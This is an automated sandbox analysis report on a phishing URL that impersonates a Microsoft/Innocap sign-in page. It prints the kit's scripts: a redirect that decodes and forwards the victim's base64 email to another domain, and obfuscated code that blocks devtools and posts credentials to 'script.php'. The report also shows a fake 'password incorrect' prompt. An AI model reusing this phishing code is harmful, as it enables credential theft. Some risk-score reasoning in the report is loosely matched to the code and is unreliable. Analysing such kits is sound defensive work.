Windows Analysis Report
http://bebizicon.com/Campususa/index.xml#?email=b2xpdmllci5kb3phdEBpbm5vY2FwLmNvbQ==

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false
}

URL: http://bebizicon.com

{
    "risk_score": 8,
    "reasoning": "This script demonstrates several high-risk behaviors, including redirecting the user to a suspicious domain ('mudedevidaparasempre.com.br') and decoding a base64-encoded email parameter, which could be used for malicious purposes such as phishing or data exfiltration. The combination of these behaviors, along with the lack of transparency or legitimate context, suggests a high-risk script."
}

                    
                        // Function to get the value of a parameter from the URL
                        function getParameterByName(name, url) {
                            if (!url) url = window.location.href;
                            name = name.replace(/[\[\]]/g, "\\$&");
                            var regex = new RegExp("[?&]" + name + "(=([^&#]*)|&|#|$)"),
                                results = regex.exec(url);
                            if (!results) return null;
                            if (!results[2]) return '';
                            return decodeURIComponent(results[2].replace(/\+/g, " "));
                        }
                        var base64EmailParam = getParameterByName('email');
                        function decodeEmail(base64Email) {
                            return atob(base64Email);
                        }
                        if (base64EmailParam) {
                            var email = decodeEmail(base64EmailParam);
                            setTimeout(function () {
                                window.location.href = 'https://mudedevidaparasempre.com.br/index5759912.htm?email=' + email;
                            }, 1000);
                        }
                    
                

{
    "risk_score": 2,
    "reasoning": "The provided JavaScript snippet appears to be a simple utility that extracts an email parameter from the current URL's query string. This behavior is common for web applications that need to handle URL parameters, and it does not demonstrate any high-risk indicators. The risk score is low, as the script is likely performing a legitimate function."
}

var surl=new URL(window.location); semail=surl.searchParams.get("email");

{
    "risk_score": 1,
    "reasoning": "This appears to be the standard jQuery library, which is a widely used and trusted JavaScript library. It does not contain any high-risk indicators, such as dynamic code execution, data exfiltration, or suspicious redirects. The code is well-structured and does not exhibit any obfuscation or aggressive DOM manipulation. Overall, this script is likely benign and used for legitimate web development purposes."
}

/*! jQuery v3.7.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[i.call(e)]||"object":typeof e}var t="3.7.0",l=/HTML$/i,ce=function(e,t){return new ce.fn.init(e,t)};function c(e){var t=!!e&&"length"in e&&e.length,n=x(e);return!v(e)&&!y(e)&&("array"===n||0===t||"number"==typeof t&&0<t&&t-1 in e)}function fe(e,t){return e.nodeName&&e.nodeName.toLowerCase()===t.toLowerCase()}ce.fn=ce.prototype={jquery:t,constructor:ce,length:0,toArray:function(){return ae.call(this)},get:function(e){return null==e?ae.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=ce.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return ce.each(this,e)},map:function(n){return this.pushStack(ce.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this.pushStack(ae.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(ce.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(ce.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:oe.sort,splice:oe.splice},ce.extend=ce.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||v(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(ce.isPlainObject(r)||(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i||ce.isPlainObject(n)?n:{},i=!1,a[t]=ce.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},ce.extend({expando:"jQuery"+(t+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==i.call(e))&&(!(t=r(e))||"function"==typeof(n=ue.call(t,"constructor")&&t.constructor)&&o.call(n)===a)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){m(e,{nonce:t&&t.nonce},n)},each:function(e,t){var n,r=0;if(c(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},text:function(e){var t,n="",r=0,i=e.nodeType;if(i){if(1===i||9===i||11===i)return e.textContent;if(3===i||4===i)return e.nodeValue}else while(t=e[r++])n+=ce.text(t);return n},makeArray:function(e,t){var n=t||[];return null!=e&&(c(Object(e))?ce.merge(n,"string"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:se.call(t,e,n)},isXMLDoc:function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument||e).documentElement;return!l.test(t||n&&n.nodeName||"HTML")},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){var r,

{
    "risk_score": 9,
    "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script uses the `eval` function to execute remote or dynamic code, which poses a significant security risk. It also sends user data (potentially including sensitive information like cookies or session identifiers) to external servers, which could lead to data exfiltration. Additionally, the script uses heavily obfuscated code and URLs, making it difficult to analyze and understand its true purpose. These factors, combined with the suspicious nature of the script's behavior, indicate a high risk of malicious intent."
}

       function _0x496c(){var _0x1d3579=['296ZIxXNs','log','prototype','1420lrozaH','toString','trace','917462xaJkqA','error','634536LSpEol','7883352TpabIk','table','exception','317961rFIbHQ','178967eYZNyA','8NwClPj','onkeydown','console','bind','search','(((.+)+)+)+$','419652WBikVP','apply','return\x20(function()\x20','keyCode','contextmenu'];_0x496c=function(){return _0x1d3579;};return _0x496c();}var _0x3f0783=_0x5740;(function(_0x1e6505,_0x96876c){var _0x2cbc3a=_0x5740,_0x1d4735=_0x1e6505();while(!![]){try{var _0x11f3c6=-parseInt(_0x2cbc3a(0x163))/0x1+-parseInt(_0x2cbc3a(0x15e))/0x2+-parseInt(_0x2cbc3a(0x162))/0x3+parseInt(_0x2cbc3a(0x156))/0x4*(-parseInt(_0x2cbc3a(0x159))/0x5)+parseInt(_0x2cbc3a(0x151))/0x6+-parseInt(_0x2cbc3a(0x15c))/0x7*(parseInt(_0x2cbc3a(0x164))/0x8)+parseInt(_0x2cbc3a(0x15f))/0x9;if(_0x11f3c6===_0x96876c)break;else _0x1d4735['push'](_0x1d4735['shift']());}catch(_0x16b797){_0x1d4735['push'](_0x1d4735['shift']());}}}(_0x496c,0x2ec4e));var _0x3085a7=(function(){var _0xf352e4=!![];return function(_0x11b422,_0xff323b){var _0x27e3fd=_0xf352e4?function(){if(_0xff323b){var _0x535ea9=_0xff323b['apply'](_0x11b422,arguments);return _0xff323b=null,_0x535ea9;}}:function(){};return _0xf352e4=![],_0x27e3fd;};}()),_0x41a8ad=_0x3085a7(this,function(){var _0x25e311=_0x5740;return _0x41a8ad[_0x25e311(0x15a)]()[_0x25e311(0x14f)](_0x25e311(0x150))[_0x25e311(0x15a)]()['constructor'](_0x41a8ad)[_0x25e311(0x14f)]('(((.+)+)+)+$');});_0x41a8ad();var _0x2d8d99=(function(){var _0x16cc4a=!![];return function(_0x3d69c3,_0x1c44c5){var _0x3af659=_0x16cc4a?function(){var _0x507834=_0x5740;if(_0x1c44c5){var _0x2b2d9f=_0x1c44c5[_0x507834(0x152)](_0x3d69c3,arguments);return _0x1c44c5=null,_0x2b2d9f;}}:function(){};return _0x16cc4a=![],_0x3af659;};}()),_0x3f164b=_0x2d8d99(this,function(){var _0x401c9e=_0x5740,_0x238212=function(){var _0x4b7226=_0x5740,_0x417967;try{_0x417967=Function(_0x4b7226(0x153)+'{}.constructor(\x22return\x20this\x22)(\x20)'+');')();}catch(_0x5da31b){_0x417967=window;}return _0x417967;},_0x366315=_0x238212(),_0x4b49ae=_0x366315['console']=_0x366315[_0x401c9e(0x14d)]||{},_0x177120=[_0x401c9e(0x157),'warn','info',_0x401c9e(0x15d),_0x401c9e(0x161),_0x401c9e(0x160),_0x401c9e(0x15b)];for(var _0xfaf8b7=0x0;_0xfaf8b7<_0x177120['length'];_0xfaf8b7++){var _0x8fd877=_0x2d8d99['constructor'][_0x401c9e(0x158)][_0x401c9e(0x14e)](_0x2d8d99),_0x2f2eb3=_0x177120[_0xfaf8b7],_0x54b937=_0x4b49ae[_0x2f2eb3]||_0x8fd877;_0x8fd877['__proto__']=_0x2d8d99[_0x401c9e(0x14e)](_0x2d8d99),_0x8fd877[_0x401c9e(0x15a)]=_0x54b937[_0x401c9e(0x15a)][_0x401c9e(0x14e)](_0x54b937),_0x4b49ae[_0x2f2eb3]=_0x8fd877;}});function _0x5740(_0x174e82,_0x57db5b){var _0x51943f=_0x496c();return _0x5740=function(_0x3f164b,_0x2d8d99){_0x3f164b=_0x3f164b-0x14c;var _0x5c4daa=_0x51943f[_0x3f164b];return _0x5c4daa;},_0x5740(_0x174e82,_0x57db5b);}_0x3f164b(),$(document)['bind'](_0x3f0783(0x155),function(_0x31051a){return![];}),document[_0x3f0783(0x14c)]=function(_0x2b584b){var _0x116636=_0x3f0783;return _0x2b584b['ctrlKey']&&(_0x2b584b[_0x116636(0x154)]===0x49||_0x2b584b['keyCode']===0x69||_0x2b584b[_0x116636(0x154)]===0x4a||_0x2b584b[_0x116636(0x154)]===0x6a||_0x2b584b[_0x116636(0x154)]===0x55||_0x2b584b[_0x116636(0x154)]===0x75)?![]:!![];};
          
               var pagemsg="{\"LoginPage\":{\"text\":null,\"color\":\"black\"},\"PassPage\":{\"text\":null,\"color\":\"black\"}}";
            var semail = "";
             var urlx,purlx,lmode;
          urlx = atob("c2NyaXB0LnBocA==");
            lmode="b";
            purlx=urlx;
        

{
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
  "brands": [
    "Microsoft"
  ]
}

{
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Sign in",
"text_input_field_labels": [
"Enter password"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
  "brands": [
    "Innocap"
  ]
}

{
  "contains_trigger_text": true,
  "trigger_text": "Your account or password is incorrect. If you don't remember your password, reset it now.",
  "prominent_button_name": "Sign in",
  "text_input_field_labels": [
    "Enter password"
  ],
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": "unknown"
}

```json{  "legit_domain": "innocap.com",  "classification": "known",  "reasons": [    "The brand 'Innocap' is known and typically associated with the domain 'innocap.com'.",    "The provided URL 'mudedevidaparasempre.com.br' does not match the legitimate domain for Innocap.",    "The URL is in Portuguese, which may not align with Innocap's typical branding or target audience.",    "The URL does not contain any recognizable elements related to Innocap.",    "Presence of an input field for 'Enter password' on an unrelated domain is suspicious."  ],  "riskscore": 8}
Google indexed: True

URL: mudedevidaparasempre.com.br
			Brands: Innocap
			Input Fields: Enter password